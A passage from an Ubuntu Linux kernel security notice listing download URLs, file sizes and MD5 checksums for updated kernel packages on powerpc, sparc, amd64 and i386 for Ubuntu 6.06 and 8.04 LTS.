http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb\n      Size/MD5:   872596 8602056ab95806f02667587737cb3b59\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb\n      Size/MD5:   865624 336f5e63d1fc8a9f55e7e36f4177f54a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_powerpc.deb\n      Size/MD5:  6947694 9ab99966a30e44788549998ae0e26798\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc-smp_2.6.15-55.82_powerpc.deb\n      Size/MD5: 22783922 2c7ace12a48de978cea2e7e939c3c900\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc64-smp_2.6.15-55.82_powerpc.deb\n      Size/MD5: 23693062 18b76996711d54f91edd68a52b45d666\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-powerpc_2.6.15-55.82_powerpc.deb\n      Size/MD5: 22365356 f8a73866c9b4334ace774f26ddaa0e38\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    17782 6a4cc5fc57579f3f602f582acb1231fb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    17386 1abc2376b554610aec23e87f60998358\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   261350 a2a6eff082f29827c9505b45dee47f7d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   282620 93ef7729a3cc9f4639e9d34c8782d8c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   227808 73c5142c206284bb244b59586a93d8b6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   248952 d0c1d09bb0b125ae113a70baa7a06cc0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1048470 66d28a86b670f1166faeb1c25a1547ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1048600 178ea75b2bd02ef3b01c4cf940b6a713\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1738490 8fdc1918d06d76e358e7645e24d763b5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1878020 0b6e4cc3971bb034e26a3aee110cbc58\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   250814 c48a5e0837fa30e3b1480c113c02d963\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   233524 676bf7f8905001fea721689f23ae5f6e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    13054 73a21ffbe4470fe4108886ee20990c35\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    13528 1105da0ce6deb9d13a19e8b6398827db\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    84794 ccbc384bd76aacf39ac078437d709d51\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    52204 acd012d94fac6fd62028de4920ff5a67\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    73922 a2d1c6a539934c1a852cf0b2c56ada43\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    85854 59c8914383ae0624690950d8f844c101\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     6624 b926e6807098f087b5eab77015ef1aee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:     7058 43cb29678a86a4ace2a784ef2c2e8843\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    60378 183583ac6a0ab738109499861a861ca2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    70420 da9263ada0b850362f022c36b6769f22\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   128550 5eaff599374f099cbb06bb709f1ce68c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   157944 8ef2e5efb4749e8e1725c58a185871bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   108166 1a09b1fb98eb414ba847dc8634a28a62\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   126130 e2ae3a3d5d06c8e6a5394c2262381438\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    87294 610a552fd6a9c960f64c8ed4a74c5b39\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    93362 a7434712a48c99eba3cfd1dcdf4db489\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  2014708 a089ebb3c11c6fd25f65c069adc4f1cb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:  1988690 049558cbf765292686c49fc8e180ca0f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   104130 cfa3ef8f4085a002160c319cdc9899ed\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   115790 ac0661102201e3f682eda1052d987671\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    12738 f683a291e68f38a5c2785aed5452f77c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    14444 24e22f4de6be23c1fe122e8c3dbdfdc0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    39950 b8aa9421b4aaf324bc7349b026e3c30e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ufs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    41540 c174de599d57427fbbe0544bdea28cf0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   149344 f742184c85574c83ec84aa70cb9cdfea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   168082 6f375034031b861fe42ba973c9390ded\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    42310 e24ddfc7d97416cdca5325a9ce197781\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:    44918 de0152b64cf3da754a73ba952625e15b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   320326 87594e9f43ab0dff57a8ae731be77dfa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb\n      Size/MD5:   324872 a53f9d6f2e8118894b3c5ee8a98b7441\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    50476 aea13d5d96a87d5b3a0cb897605f8226\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:     2358 b0af3cd8de1581e95acdba1dd91796e9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    40380 c083f0781fb33b64329d10c233affde2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   110556 cea10ae3446945f5dcc6b94a8050b4ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    41214 b0728ed58d1e1a5bcc4309849d773e91\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   104224 54844dc4f0225e051453b6a01934edb3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:     7438 7cfdeca11c465cea2c2e8d768b39969e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   149304 958f0b630326763cddddce5503f3319d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:  1712530 f967805acb454413bbcc2f377f5b3e36\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb\n      Size/MD5:   773010 979da22c264d122841ea140319b365ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb\n      Size/MD5:   772604 3106b0711e0e311f93d92624247f1eea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.82_sparc.deb\n      Size/MD5:  6964184 fb615cef69d2a79b16cfda4b67bf4e50\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb\n      Size/MD5: 15017856 479231852577fdd0e402556287a02059\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-sparc64_2.6.15-55.82_sparc.deb\n      Size/MD5: 14831912 1bd18f6f1ccc6b70379e267a0173b9bb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:     7436 87e52fb1ba93a9e9763a0f3984bc15a5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   248758 bc3db8ee9c85b0aaf1ec03290ae41cf3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   212566 70a9e482f9be5074d90bbd4ae5cf1246\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:  1048480 c535170499441feef6ef8b3062de2d30\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:  1482394 247faeb24ed7d02526dc54dfb194dec4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    10118 28a82b2b4d4934c028952b17676d515a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    40178 d44c9cb160749b87062ff38c0fc11340\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:     9370 c7d50aabcba6ff111825da92f10dd219\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    61398 df892cd2f9e118248246eb7d3c273df4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   163276 481deef18ee50e039791747737619c3e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    64096 9ebc582fc849cdcf71ee887937313a22\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:  1235396 479e0c0baad9c8cf96fe44603c2fb9b9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    59308 83efde441d0de3f09bb163e53016a300\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:    37430 3646c295a3bbadafbe6df1fb22d8391e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb\n      Size/MD5:   280132 311d2d465db827f3e3f2e95bc265ddb6\n\nUpdated packages for Ubuntu 8.04 LTS:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.diff.gz\n      Size/MD5:  4747158 57102623f2993049cb4d309f75748b5f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.dsc\n      Size/MD5:     2689 3d66528dd1a11628dd0e2ec5fadfa2b0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24.orig.tar.gz\n      Size/MD5: 59085601 e4aad2f8c445505cbbfa92864f5941ab\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.24_2.6.24-27.65_all.deb\n      Size/MD5:  4930936 41797a4c4537dc9e4abb06f5b811a6f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27_2.6.24-27.65_all.deb\n      Size/MD5:  8146690 ea0f32ddeaa300bc68f90838a6466257\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-27.65_all.deb\n      Size/MD5:    99216 bec450b038c03760a6f369323af1a0d5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.24_2.6.24-27.65_all.deb\n      Size/MD5: 46970850 cadaea7041848682d5e46a181aa43fb4\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    28614 de37ceb847d7f811723dee03e7fc9ab9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   224184 6b392a2ef779b2048c78f46c1e833e2f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    52646 2c736bab70f1efeade320f9062b74729\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    40644 a6209cbd666c38e1c4bc75115fda79f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    48646 6affd584126a9ecd4d3560dfa69a201f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    86332 097b613836ca5101cd37cabfe7299adc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    36316 f3915273cbd0e4a218a543ac525d7674\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   648728 9021fcdfc468efb5a2994dab918aad7a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   209928 967a98f6cfa9c56dcecbe0872e98b617\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    39194 5ad172f156b5e2ba43fee3a69a09fb49\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    67996 9ca474a40f4225116d7d9befcde4dbb5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   145458 3e087634d61556643c32e342214a0642\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   287262 202933f0bb0a3d09ae278a991139eaf1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:  2130554 f0a40b4f0002803063b074d4b2b22775\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_amd64.deb\n      Size/MD5:   673974 3ee01bd889b29b761f96eab35f839815\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_amd64.deb\n      Size/MD5:  1252948 e0734c904a26acf9daadc8dc13a5331c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_amd64.deb\n      Size/MD5:  1274832 4784ef460e510677dd0c62ba0e5d75a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_amd64.deb\n      Size/MD5:   674092 b2b2090661ff113ec00e1b08627238c3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_amd64.deb\n      Size/MD5:  1084370 ef5cd734b586855f7b94d5b93bb51c42\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_amd64.deb\n      Size/MD5: 17809172 46d4f01f3cb62fc8c006c25d291bdbde\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_amd64.deb\n      Size/MD5: 17781410 589743282c76d9ae95751cefae7dcd1f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_amd64.deb\n      Size/MD5: 21055946 71c5ed78b283260aa76abe43a5199869\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_amd64.deb\n      Size/MD5: 21440010 76e220b0a64e1b1fb76a54aaa5cde808\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_amd64.deb\n      Size/MD5:   707586 4d51f71c8ac5227c9f02fbc0c6552453\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   263678 73ef23d338fe298802ae13ea52af05a1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   176420 0709db4bda579f5146063e7bedeef8cf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   254102 7b20912de5e61b0206319019c4800ef1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:  1641364 98d7399720bae5a9d3e1637cc6f13ce9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   143718 419053c97211aea3dd9b2aa0833bc6bc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   164466 16e2d4ad08a10d9e9d2b33dbee4c08ba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   115858 74f2c34acf328f485356f38e86eb6aa2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    35056 5307b10f96b76f43c0bf983007f36021\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    64412 7cf4750ba6f0dd63678eae705da55fbf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    69706 dedcbc58256ac2a43ed625eb7cae6e81\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    21598 6d6c27b8756a70466451449e096bd149\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:     8622 4414757aa7034cafa1e98d8bacf080f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    57232 8690d6c34e1ec87d85b2c20cb280acb9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   103044 73c875b66060da7f1d39f2a5f8eecf36\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:  1212518 6e237c8e863f3cea5cc702afbd925b77\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    45500 1883d8bdf4ed7b2aebc1a407502bd556\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    12780 fa12802bfa4f6847c5409d4882e9aa9a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:   498032 d5e81ea5e16357ae1be8c0ac77685256\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb\n      Size/MD5:    75048 24c6c2fa1972611542270d68ccae59a6\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_amd64.deb\n      Size/MD5: 19256730 d7f5e8ae9464748ac2a6dbc46ed9f1c1\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_amd64.deb\n      Size/MD5: 17909990 e4e3916570b7b5f06645d2623111b0ef\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_amd64.deb\n      Size/MD5: 18911564 fd71e9397f8919af683848aa456c885f\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    23690 ceb5d148f00965516252470b41d00b56\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    26794 50bb7020338de7d00265de0765578291\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   218818 a3b52dd67e9817d4e60d8b048f542717\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:   220482 60bf430685f9b39568dbb078edf6041c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    51932 f708bc6cc86f313031745601d3d31aa9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    52068 bd20c8c1eb151b2b8d989d5081f8386b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb\n      Size/MD5:    38326 aeea101daeed1f87bb30f67c4011d737\n    